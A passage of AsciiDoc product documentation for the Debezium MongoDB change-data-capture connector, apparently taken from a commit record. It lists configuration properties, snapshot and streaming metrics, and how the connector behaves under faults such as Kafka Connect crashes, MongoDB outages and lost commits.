configuration properties that you can set for the {prodname} MongoDB connector,\nsee xref:{link-mongodb-connector}#mongodb-connector-properties[MongoDB connector configuration properties].\n\nifdef::community[]\nYou can send this configuration with a `POST` command to a running Kafka Connect service.\nThe service records the configuration and starts one connector task that performs the following actions:\n\n* Connects to the MongoDB replica set or sharded cluster.\n* Assigns tasks for each replica set.\n* Performs a snapshot, if necessary.\n* Reads the oplog\/change stream.\n* Streams change event records to Kafka topics.\n\n[[mongodb-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a {prodname} MongoDB connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* xref:{link-mongodb-connector}#setting-up-mongodb[MongoDB is set up to work with a {prodname} connector].\n* The {prodname} MongoDB connector is installed.\n\n.Procedure\n\n. Create a configuration for the MongoDB connector.\n\n. 
Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\nendif::community[]\n\n.Results\nAfter the connector starts, it completes the following actions:\n\n* xref:{link-mongodb-connector}#mongodb-performing-a-snapshot[Performs a consistent snapshot] of the collections in your MongoDB replica sets.\n* Reads the oplogs\/change streams for the replica sets.\n* Produces change events for every inserted, updated, and deleted document.\n* Streams change event records to Kafka topics.\n\nifdef::product[]\n\/\/ Type: procedure\n[id=\"verifying-that-the-debezium-mongodb-connector-is-running\"]\n=== Verifying that the {prodname} MongoDB connector is running\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]\nendif::product[]\n\n\/\/ Type: reference\n\/\/ Title: Description of {prodname} MongoDB connector configuration properties\n[[mongodb-connector-properties]]\n=== Connector properties\n\nThe {prodname} MongoDB connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.\nMany properties have default values. Information about the properties is organized as follows:\n\n* xref:debezium-mongodb-connector-required-configuration-properties[Required {prodname} MongoDB connector configuration properties]\n* xref:debezium-mongodb-connector-advanced-configuration-properties[Advanced {prodname} MongoDB connector configuration properties]\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[id=\"debezium-mongodb-connector-required-configuration-properties\"]\n.Required {prodname} MongoDB connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[mongodb-property-name]]<<mongodb-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|[[mongodb-property-connector-class]]<<mongodb-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.mongodb.MongoDbConnector` for the MongoDB connector.\n\n|[[mongodb-property-mongodb-hosts]]<<mongodb-property-mongodb-hosts, `+mongodb.hosts+`>>\n|\n|The comma-separated list of hostname and port pairs (in the form 'host' or 'host:port') of the MongoDB servers in the replica set. The list can contain a single hostname and port pair. If `mongodb.members.auto.discover` is set to `false`, then the host and port pair should be prefixed with the replica set name (e.g., `rs0\/localhost:27017`). +\n +\n[NOTE]\n====\nIt is mandatory to provide the current primary address.\nThis limitation will be removed in the next {prodname} release.\n====\n\n|[[mongodb-property-mongodb-connection-string]]<<mongodb-property-mongodb-connection-string, `+mongodb.connection.string+`>>\n|\n|MongoDB connection string used for initial replica set discovery. This option requires `mongodb.members.auto.discover` to be set to `true` and must not be used together with `mongodb.hosts`. +\n +\n[NOTE]\n====\nAt the moment, the connection string is used only for the initial replica set discovery. 
Other configuration properties are still used when connecting directly to primary replica set members, with the exception of credentials, which (when present) are extracted from the given connection string.\n====\n\n|[[mongodb-property-mongodb-name]]<<mongodb-property-mongodb-name, `+mongodb.name+`>>\n|\n|A unique name that identifies the connector and\/or MongoDB replica set or sharded cluster that this connector monitors.\nEach server should be monitored by at most one {prodname} connector, since this server name prefixes all persisted Kafka topics emanating from the MongoDB replica set or cluster.\nUse only alphanumeric characters, hyphens, dots and underscores to form the name.\nThe logical name should be unique across all other connectors, because the name is used as the prefix in naming the Kafka topics that receive records from this connector. +\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[mongodb-property-mongodb-user]]<<mongodb-property-mongodb-user, `+mongodb.user+`>>\n|\n|Name of the database user to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-password]]<<mongodb-property-mongodb-password, `+mongodb.password+`>>\n|\n|Password to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-authsource]]<<mongodb-property-mongodb-authsource, `+mongodb.authsource+`>>\n|`admin`\n|Database (authentication source) containing MongoDB credentials. This is required only when MongoDB is configured to use authentication with another authentication database than `admin`.\n\n|[[mongodb-property-mongodb-ssl-enabled]]<<mongodb-property-mongodb-ssl-enabled, `+mongodb.ssl.enabled+`>>\n|`false`\n|The connector will use SSL to connect to MongoDB instances.\n\n|[[mongodb-property-mongodb-ssl-invalid-hostname-allowed]]<<mongodb-property-mongodb-ssl-invalid-hostname-allowed, `+mongodb.ssl.invalid.hostname.allowed+`>>\n|`false`\n|When SSL is enabled, this setting controls whether strict hostname checking is disabled during the connection phase. If `true`, the connection does not prevent man-in-the-middle attacks.\n\n|[[mongodb-property-database-include-list]]<<mongodb-property-database-include-list, `+database.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in `database.include.list` is excluded from monitoring. By default all databases are monitored.\nMust not be used with `database.exclude.list`.\n\n|[[mongodb-property-database-exclude-list]]<<mongodb-property-database-exclude-list, `+database.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in `database.exclude.list` is monitored.\nMust not be used with `database.include.list`.\n\n|[[mongodb-property-collection-include-list]]<<mongodb-property-collection-include-list, `+collection.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be monitored; any collection not included in `collection.include.list` is excluded from monitoring. 
Each identifier is of the form _databaseName_._collectionName_. By default the connector will monitor all collections except those in the `local` and `admin` databases.\nMust not be used with `collection.exclude.list`.\n\n|[[mongodb-property-collection-exclude-list]]<<mongodb-property-collection-exclude-list, `+collection.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be excluded from monitoring; any collection not included in `collection.exclude.list` is monitored. Each identifier is of the form _databaseName_._collectionName_.\nMust not be used with `collection.include.list`.\n\n|[[mongodb-property-snapshot-mode]]<<mongodb-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is *initial*, and specifies that the connector reads a snapshot when either no offset is found or if the oplog\/change stream no longer contains the previous offset. The *never* option specifies that the connector should never use snapshots; instead, the connector proceeds to tail the log.\n\n|[[mongodb-property-capture-mode]]<<mongodb-property-capture-mode, `+capture.mode+`>>\n|`change_streams_update_full`\n|Specifies the method used to capture changes from the MongoDB server. The default is *change_streams_update_full*, and specifies that the connector captures changes via MongoDB Change Streams mechanism, and that _update_ events should contain the full document. The *change_streams* mode will use the same capturing method, but _update_ events won't contain the full document. +\nThe *oplog* mode specifies that the MongoDB oplog will be accessed directly; this is the legacy method and should not be used for new connector instances.\n\n|[[mongodb-property-snapshot-include-collection-list]]<<mongodb-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All collections specified in `collection.include.list`\n|An optional, comma-separated list of regular expressions that match the names of collections specified in `collection.include.list` for which you *want* to take the snapshot.\n\n|[[mongodb-property-field-exclude-list]]<<mongodb-property-field-exclude-list, `+field.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified names of fields that should be excluded from change event message values. Fully-qualified names for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters.\n\n|[[mongodb-property-field-renames]]<<mongodb-property-field-renames, `+field.renames+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified replacements of fields that should be used to rename fields in change event message values. Fully-qualified replacements for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_:__newNestedFieldName__, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters, and the colon character (:) separates the original field name from the replacement field name. 
The next field replacement is applied to the result of the previous field replacement in the list, so keep this in mind when renaming multiple fields that are in the same path.\n\n|[[mongodb-property-tasks-max]]<<mongodb-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The MongoDB connector will attempt to use a separate task for each replica set, so the default is acceptable when using the connector with a single MongoDB replica set. When using the connector with a MongoDB sharded cluster, we recommend specifying a value that is equal to or more than the number of shards in the cluster, so that the work for each replica set can be distributed by Kafka Connect.\n\n|[[mongodb-property-snapshot-max-threads]]<<mongodb-property-snapshot-max-threads, `+snapshot.max.threads+`>>\n|`1`\n|Positive integer value that specifies the maximum number of threads used to perform an initial sync of the collections in a replica set. Defaults to 1.\n\n|[[mongodb-property-tombstones-on-delete]]<<mongodb-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[mongodb-property-snapshot-delay-ms]]<<mongodb-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before taking a snapshot after starting up. +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|[[mongodb-property-snapshot-fetch-size]]<<mongodb-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`0`\n|Specifies the maximum number of documents that should be read in one go from each collection while taking a snapshot.\nThe connector will read the collection contents in multiple batches of this size. +\nDefaults to 0, which indicates that the server chooses an appropriate fetch size.\n\n|[[mongodb-property-schema-name-adjustment-mode]]<<mongodb-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>\n|avro\n|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +\n\n* `avro` replaces the characters that cannot be used in the Avro type name with underscore. +\n* `none` does not apply any adjustment. +\n\n|===\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[id=\"debezium-mongodb-connector-advanced-configuration-properties\"]\n.{prodname} MongoDB connector advanced configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[mongodb-property-max-batch-size]]<<mongodb-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. 
Defaults to 2048.\n\n|[[mongodb-property-max-queue-size]]<<mongodb-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[mongodb-property-max-queue-size-in-bytes]]<<mongodb-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:mongodb-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[mongodb-property-poll-interval-ms]]<<mongodb-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|[[mongodb-property-connect-backoff-initial-delay-ms]]<<mongodb-property-connect-backoff-initial-delay-ms, `+connect.backoff.initial.delay.ms+`>>\n|`1000`\n|Positive integer value that specifies the initial delay when trying to reconnect to a primary after the first failed connection attempt or when no primary is available. Defaults to 1 second (1000 ms).\n\n|[[mongodb-property-connect-backoff-max-delay-ms]]<<mongodb-property-connect-backoff-max-delay-ms, `+connect.backoff.max.delay.ms+`>>\n|`120000`\n|Positive integer value that specifies the maximum delay when trying to reconnect to a primary after repeated failed connection attempts or when no primary is available. Defaults to 120 seconds (120,000 ms).\n\n|[[mongodb-property-connect-max-attempts]]<<mongodb-property-connect-max-attempts, `+connect.max.attempts+`>>\n|`16`\n|Positive integer value that specifies the maximum number of failed connection attempts to a replica set primary before an exception occurs and the task is aborted. Defaults to 16, which with the defaults for `connect.backoff.initial.delay.ms` and `connect.backoff.max.delay.ms` results in just over 20 minutes of attempts before failing.\n\n|[[mongodb-property-mongodb-members-auto-discover]]<<mongodb-property-mongodb-members-auto-discover, `+mongodb.members.auto.discover+`>>\n|`true`\n|Boolean value that specifies whether the addresses in 'mongodb.hosts' are seeds that should be used to discover all members of the cluster or replica set (`true`), or whether the address(es) in `mongodb.hosts` should be used as is (`false`). 
The default is `true` and should be used in all cases except where MongoDB is xref:{link-mongodb-connector}#mongodb-replicaset[fronted by a proxy].\n\nifdef::community[]\n|[[mongodb-property-source-struct-version]]<<mongodb-property-source-struct-version, `+source.struct.version+`>>\n|v2\n|Schema version for the `source` block in CDC events. {prodname} 0.10 introduced a few breaking +\nchanges to the structure of the `source` block in order to unify the exposed structure across\nall the connectors. +\nBy setting this option to `v1` the structure used in earlier versions can be produced.\nNote that this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mongodb-property-heartbeat-interval-ms]]<<mongodb-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends messages into a heartbeat topic.\nThis can be used to monitor whether the connector is still receiving change events from the database.\nYou should also leverage heartbeat messages in cases where only records in non-captured collections change for a longer period of time.\nIn such a situation, the connector continues to read the oplog\/change stream from the database but never emits any change messages into Kafka, which in turn means that no offset updates are committed to Kafka.\nAs a result, the oplog files can be rotated out without the connector noticing; after a restart, some events are no longer available, and the connector must re-execute the initial snapshot.\n\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|[[mongodb-property-sanitize-field-names]]<<mongodb-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.\n|Whether field names are sanitized to adhere to Avro naming requirements.\nifdef::community[]\nSee xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.\nendif::community[]\n\n|[[mongodb-property-skipped-operations]]<<mongodb-property-skipped-operations, `+skipped.operations+`>>\n|\n|A comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[mongodb-property-snapshot-collection-filter-overrides]]<<mongodb-property-snapshot-collection-filter-overrides, `+snapshot.collection.filter.overrides+`>>\n|\n|Controls which collection items are included in a snapshot. This property affects snapshots only. Specify a comma-separated list of collection names in the form _databaseName.collectionName_.\n\nFor each collection that you specify, also specify another configuration property: `snapshot.collection.filter.overrides._databaseName_._collectionName_`. For example, the name of the other configuration property might be: `snapshot.collection.filter.overrides.customers.orders`. Set this property to a valid filter expression that retrieves only the items that you want in the snapshot. 
When the connector performs a snapshot, it retrieves only the items that match the filter expression.\n\n|[[mongodb-property-provide-transaction-metadata]]<<mongodb-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|When set to `true`, {prodname} generates events with transaction boundaries and enriches the data event envelope with transaction metadata.\n\nSee xref:{link-mongodb-connector}#mongodb-transaction-metadata[Transaction Metadata] for additional details.\n\n|[[mongodb-property-retriable-restart-connector-wait-ms]]<<mongodb-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|[[mongodb-property-mongodb-poll-interval-ms]]<<mongodb-property-mongodb-poll-interval-ms, `+mongodb.poll.interval.ms+`>>\n|`30000`\n|The interval in which the connector polls for new, removed, or changed replica sets.\n\n|[[mongodb-property-mongodb-connect-timeout-ms]]<<mongodb-property-mongodb-connect-timeout-ms, `+mongodb.connect.timeout.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds the driver will wait before a new connection attempt is aborted.\n\n|[[mongodb-property-mongodb-socket-timeout-ms]]<<mongodb-property-mongodb-socket-timeout-ms, `+mongodb.socket.timeout.ms+`>>\n|0\n|The number of milliseconds before a send\/receive on the socket can take before a timeout occurs.\nA value of `0` disables this behavior.\n\n|[[mongodb-property-mongodb-server-selection-timeout-ms]]<<mongodb-property-mongodb-server-selection-timeout-ms, `+mongodb.server.selection.timeout.ms+`>>\n|30000 (30 seconds)\n|The number of milliseconds the driver will wait to select a server before it times out and throws an error.\n\n|[[mongodb-property-cursor-max-await-time-ms]]<<mongodb-property-cursor-max-await-time-ms, `+cursor.max.await.time.ms+`>>\n|`0`\n|Specifies the maximum number of milliseconds the oplog\/change stream cursor will wait for the server to produce a result before causing an execution timeout exception.\nA value of `0` indicates using the server\/driver default wait timeout.\n\n|[[mongodb-property-signal-data-collection]]<<mongodb-property-signal-data-collection, `+signal.data.collection+`>>\n|No default\n|Fully-qualified name of the data collection that is used to send {link-prefix}:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector.\nUse the following format to specify the collection name: +\n`_<databaseName>_._<collectionName>_` +\nifdef::product[]\nSignaling is a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-incremental-snapshot-chunk-size]]<<mongodb-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>\n|`1024`\n|The maximum number of documents that the connector fetches and reads into memory during an incremental snapshot chunk.\nIncreasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.\nHowever, larger chunk sizes also require more memory to buffer the snapshot data.\nAdjust the chunk size to a value that provides the best performance in your environment. 
+\nifdef::product[]\nIncremental snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-topic-naming-strategy]]<<mongodb-property-topic-naming-strategy, `topic.naming.strategy`>>\n|`io.debezium.schema.DefaultTopicNamingStrategy`\n|The name of the `TopicNamingStrategy` class that should be used to determine the topic name for data change, schema change, transaction, and heartbeat events. Defaults to `DefaultTopicNamingStrategy`.\n\n|[[mongodb-property-topic-delimiter]]<<mongodb-property-topic-delimiter, `topic.delimiter`>>\n|`.`\n|Specifies the delimiter for topic names. Defaults to `.`.\n\n|[[mongodb-property-topic-prefix]]<<mongodb-property-topic-prefix, `topic.prefix`>>\n|`${mongodb.name}`\n|The prefix to be used for all topic names. Defaults to xref:mongodb-property-mongodb-name[`${mongodb.name}`].\n[NOTE]\n====\nOnce you specify a value for this property, xref:mongodb-property-mongodb-name[`${mongodb.name}`] no longer serves as the prefix for topic names.\n====\n\n|[[mongodb-property-topic-cache-size]]<<mongodb-property-topic-cache-size, `topic.cache.size`>>\n|`10000`\n|The size of the bounded concurrent hash map that is used to hold topic names. This cache helps to determine the topic name that corresponds to a given data collection.\n\n|[[mongodb-property-topic-heartbeat-prefix]]<<mongodb-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_topic.heartbeat.prefix_._topic.prefix_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mongodb-property-topic-transaction]]<<mongodb-property-topic-transaction, `topic.transaction`>>\n|`transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. 
The topic name has this pattern: +\n +\n_topic.prefix_._topic.transaction_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-performance\n\/\/ Title: Monitoring {prodname} MongoDB connector performance\n[[mongodb-monitoring]]\n== Monitoring\n\nThe {prodname} MongoDB connector has two metric types in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect have.\n\n* xref:{link-mongodb-connector}#mongodb-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* xref:{link-mongodb-connector}#mongodb-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nThe xref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details about how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-mongodb-snapshots\n\/\/ Title: Monitoring {prodname} during MongoDB snapshots\n[[mongodb-snapshot-metrics]]\n=== Snapshot Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom snapshot metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-record-streaming\n\/\/ Title: Monitoring {prodname} MongoDB connector record streaming\n[[mongodb-streaming-metrics]]\n=== Streaming Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom streaming metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|`NumberOfPrimaryElections`\n|`long`\n|Number of primary node elections.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mongodb-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MongoDB connectors handle faults and problems\n[[mongodb-when-things-go-wrong]]\n== MongoDB connector common issues\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event.\nWhen the system is operating normally and is managed carefully, then {prodname} provides _exactly once_ delivery of every change event.\n\nIf a fault occurs, the system does not lose any events.\nHowever, while it is recovering from the fault, it might repeat some change events.\nIn such situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector handles various kinds of faults and 
problems.\n\n* xref:debezium-mongodb-connector-configuration-and-startup-errors[]\n* xref:mongodb-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mongodb-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mongodb-kafka-connect-process-crashes[]\n* xref:debezium-mongodb-kafka-process-becomes-unavailable[]\n* xref:debezium-mongodb-connector-is-stopped-for-a-long-interval[]\n* xref:mongodb-crash-results-in-lost-commits[]\n\nendif::product[]\n\n[id=\"debezium-mongodb-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to MongoDB by using the specified connection parameters.\n\nAfter a failure, the connector attempts to reconnect by using exponential backoff.\nYou can configure the maximum number of reconnection attempts.\n\nIn these cases, the error will have more details about the problem and possibly a suggested work around. The connector can be restarted when the configuration has been corrected or the MongoDB problem has been addressed.\n\n[id=\"mongodb-becomes-unavailable-while-debezium-is-running\"]\n=== MongoDB becomes unavailable\n\nOnce the connector is running, if the primary node of any of the MongoDB replica sets become unavailable or unreachable, the connector will repeatedly attempt to reconnect to the primary node, using exponential backoff to prevent saturating the network or servers. If the primary remains unavailable after the configurable number of connection attempts, the connector will fail.\n\nThe attempts to reconnect are controlled by three properties:\n\n* `connect.backoff.initial.delay.ms` - The delay before attempting to reconnect for the first time, with a default of 1 second (1000 milliseconds).\n* `connect.backoff.max.delay.ms` - The maximum delay before attempting to reconnect, with a default of 120 seconds (120,000 milliseconds).\n* `connect.max.attempts` - The maximum number of attempts before an error is produced, with a default of 16.\n\nEach delay is double that of the prior delay, up to the maximum delay. 
Given the default values, the following table shows the delay for each failed connection attempt and the total accumulated time before failure.\n\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|Reconnection attempt number\n|Delay before attempt, in seconds\n|Total delay before attempt, in minutes and seconds\n\n|1 |1 |00:01\n|2 |2 |00:03\n|3 |4 |00:07\n|4 |8 |00:15\n|5 |16 |00:31\n|6 |32 |01:03\n|7 |64 |02:07\n|8 |120|04:07\n|9 |120|06:07\n|10 |120|08:07\n|11 |120|10:07\n|12 |120|12:07\n|13 |120|14:07\n|14 |120|16:07\n|15 |120|18:07\n|16 |120|20:07\n|===\n\n[id=\"debezium-mongodb-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nIf Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that processes Kafka Connect will migrate all of the process' connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off.\nThere is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\nIf the group contains only one process and that process is stopped gracefully, then Kafka Connect will stop the connector and record the last offset for each replica set. Upon restart, the replica set tasks will continue exactly where they left off.\n\n[id=\"debezium-mongodb-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, then any connector tasks it was running will terminate without recording their most recently-processed offsets.\nWhen Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes.\nHowever, the MongoDB connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash.\nThe number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\n[NOTE]\n====\nBecause there is a chance that some events may be duplicated during a recovery from failure, consumers should always anticipate some events may be duplicated. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\n{prodname} also includes with each change event message the source-specific information about the origin of the event, including the MongoDB event's unique transaction identifier (`h`) and timestamp (`sec` and `ord`). Consumers can keep track of other of these values to know whether it has already seen a particular event.\n====\n\n[id=\"debezium-mongodb-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency that you have specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. 
In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.\n\n[id=\"debezium-mongodb-connector-is-stopped-for-a-long-interval\"]\n=== Connector is stopped for a long interval\n\nIf the connector is gracefully stopped, the replica sets can continue to be used and any new changes are recorded in MongoDB's oplog.\nWhen the connector is restarted, it will resume streaming changes for each replica set where it last left off, recording change events for all of the changes that were made while the connector was stopped.\nIf the connector is stopped long enough such that MongoDB purges from its oplog some operations that the connector has not read, then upon startup the connector will perform a snapshot.\n\nA properly configured Kafka cluster is capable of massive throughput.\nKafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events.\nBecause of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MongoDB.\n\n[NOTE]\n====\nIf the connector remains stopped for long enough, MongoDB might purge older oplog files and the connector's last position may be lost.\nIn this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MongoDB server will no longer have the starting point and the connector will fail with an error.\n====\n\n[id=\"mongodb-crash-results-in-lost-commits\"]\n=== MongoDB loses writes\n\nIn certain failure situations, MongoDB can lose commits, which results in the MongoDB connector being unable to capture the lost changes.\nFor example, if the primary crashes suddenly after it applies a change and records the change to its oplog, the oplog might become unavailable before secondary nodes can read its contents.\nAs a result, the secondary node that is elected as the new primary node might be missing the most recent changes from its oplog.\n\nAt this time, there is no way to prevent this side effect in MongoDB.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-mongodb\"]\n= {prodname} connector for MongoDB\n\n:context: mongodb\n:data-collection: collection\n:mbean-name: {context}\n:connector-file: {context}\n:connector-class: MongoDb\n:connector-name: MongoDB\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\nendif::community[]\n\n{prodname}'s MongoDB connector tracks a MongoDB replica set or a MongoDB sharded cluster for document changes in databases and collections, recording those changes as events in Kafka topics.\nThe connector automatically handles the addition or removal of shards in a sharded cluster, changes in membership of each replica set, elections within each replica set, and awaiting the resolution of 